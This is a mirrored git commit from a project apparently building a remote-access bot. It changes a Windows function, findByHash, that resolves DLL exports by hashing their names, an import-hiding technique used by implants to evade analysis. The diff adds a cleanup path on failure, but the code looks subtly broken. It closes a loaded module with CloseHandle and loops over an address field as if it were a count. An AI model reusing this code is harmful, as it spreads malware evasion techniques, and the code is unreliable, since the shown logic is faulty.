mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-24 05:31:03 +00:00
Bot: added library cleanup to findByHash()
This commit is contained in:
parent
b2f8efc402
commit
f92bbbc85b
@ -72,6 +72,8 @@ uint32_t getHashName(LPCSTR cszName)
|
|||||||
return u32Hash;
|
return u32Hash;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* fork of the resolve_find() with the weird struct stripped. also library cleanup for the fail
|
||||||
|
condition was added */
|
||||||
void *findByHash(LPCWSTR module, uint32_t hash)
|
void *findByHash(LPCWSTR module, uint32_t hash)
|
||||||
{
|
{
|
||||||
HMODULE hLibrary;
|
HMODULE hLibrary;
|
||||||
@ -87,18 +89,18 @@ void *findByHash(LPCWSTR module, uint32_t hash)
|
|||||||
/* grab DOS headers & verify */
|
/* grab DOS headers & verify */
|
||||||
pDOSHdr = (PIMAGE_DOS_HEADER)hLibrary;
|
pDOSHdr = (PIMAGE_DOS_HEADER)hLibrary;
|
||||||
if (pDOSHdr->e_magic != IMAGE_DOS_SIGNATURE)
|
if (pDOSHdr->e_magic != IMAGE_DOS_SIGNATURE)
|
||||||
return NULL;
|
goto _findByHashFail;
|
||||||
|
|
||||||
/* grab NT headers & verify */
|
/* grab NT headers & verify */
|
||||||
pNTHdr = (PIMAGE_NT_HEADERS)RESOLVE_REL_CALC(hLibrary, pDOSHdr->e_lfanew);
|
pNTHdr = (PIMAGE_NT_HEADERS)RESOLVE_REL_CALC(hLibrary, pDOSHdr->e_lfanew);
|
||||||
if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)
|
if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)
|
||||||
return NULL;
|
goto _findByHashFail;
|
||||||
|
|
||||||
/* verify that this NT file is a DLL & actually exports functions */
|
/* verify that this NT file is a DLL & actually exports functions */
|
||||||
if ((pNTHdr->FileHeader.Characteristics & IMAGE_FILE_DLL) == 0 ||
|
if ((pNTHdr->FileHeader.Characteristics & IMAGE_FILE_DLL) == 0 ||
|
||||||
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0 ||
|
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0 ||
|
||||||
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size == 0)
|
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size == 0)
|
||||||
return NULL;
|
goto _findByHashFail;
|
||||||
|
|
||||||
pIED = (PIMAGE_EXPORT_DIRECTORY)RESOLVE_REL_CALC(
|
pIED = (PIMAGE_EXPORT_DIRECTORY)RESOLVE_REL_CALC(
|
||||||
hLibrary,
|
hLibrary,
|
||||||
@ -111,10 +113,14 @@ void *findByHash(LPCWSTR module, uint32_t hash)
|
|||||||
/* walk library export table, compare hashes until we find a match */
|
/* walk library export table, compare hashes until we find a match */
|
||||||
for (DWORD i = 0; i < pIED->AddressOfFunctions; i++) {
|
for (DWORD i = 0; i < pIED->AddressOfFunctions; i++) {
|
||||||
if (getHashName((LPCSTR)RESOLVE_REL_CALC(hLibrary, pdwNames[i])) == hash)
|
if (getHashName((LPCSTR)RESOLVE_REL_CALC(hLibrary, pdwNames[i])) == hash)
|
||||||
|
/* return the pointer to our function. we don't worry about closing the library's
|
||||||
|
handle because we'll need it loaded until we exit. */
|
||||||
return (void *)RESOLVE_REL_CALC(hLibrary, pdwAddress[pwOrd[i]]);
|
return (void *)RESOLVE_REL_CALC(hLibrary, pdwAddress[pwOrd[i]]);
|
||||||
}
|
}
|
||||||
|
|
||||||
/* function name was not found */
|
_findByHashFail:
|
||||||
|
/* function was not found, close the library handle since we don't need it anymore */
|
||||||
|
CloseHandle(hLibrary);
|
||||||
return NULL;
|
return NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user